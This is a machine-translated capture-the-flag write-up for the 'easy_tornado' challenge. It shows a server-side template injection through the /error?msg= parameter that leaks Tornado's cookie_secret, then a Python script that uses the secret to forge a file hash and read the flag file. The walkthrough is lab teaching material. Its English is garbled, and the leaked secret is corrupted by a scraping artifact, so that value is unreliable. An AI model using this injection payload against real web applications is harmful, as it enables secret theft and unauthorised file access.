当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllagFind out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
renderrender yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))Succeed in getting flag.
边栏推荐
猜你喜欢
![[quickstart to Digital IC Validation] 15. Basic syntax for SystemVerilog Learning 2 (operator, type conversion, loop, Task / Function... Including practical exercises)](/img/e1/9a047ef13299b94b5314ee6865ba26.png)
[quickstart to Digital IC Validation] 15. Basic syntax for SystemVerilog Learning 2 (operator, type conversion, loop, Task / Function... Including practical exercises)
Quickly use Jacobo code coverage statistics
微信小程序基本组件使用介绍
2022 Inner Mongolia latest advanced fire facility operator simulation examination question bank and answers
【数字IC验证快速入门】17、SystemVerilog学习之基本语法4(随机化Randomization)
Linux server development, redis source code storage principle and data model
追风赶月莫停留,平芜尽处是春山
Content of string
让Livelink初始Pose与动捕演员一致
The largest 3 same digits in the string of leetcode simple question
随机推荐
互动送书-《Oracle DBA工作笔记》签名版
央视太暖心了,手把手教你写HR最喜欢的简历
Leetcode simple question: find the K beauty value of a number
C语言队列
The legend about reading the configuration file under SRC
Es FAQ summary
Who has docker to install MySQL locally?
LeetCode简单题之字符串中最大的 3 位相同数字
基于Pytorch 框架手动完成线性回归
芯片资料 网站 易特创芯
快解析内网穿透助力外贸管理行业应对多种挑战
ROS Bridge 笔记(05)— carla_ackermann_control 功能包(将Ackermann messages 转化为 CarlaEgoVehicleControl 消息)
Linux server development, MySQL index principle and optimization
Custom class loader loads network class
Qinglong panel -- finishing usable scripts
2022 National latest fire-fighting facility operator (primary fire-fighting facility operator) simulation questions and answers
Uniapp mobile terminal forced update function
Topic not received? Try this
ZCMU--1492: Problem D(C语言)
Introduction à l'objet blob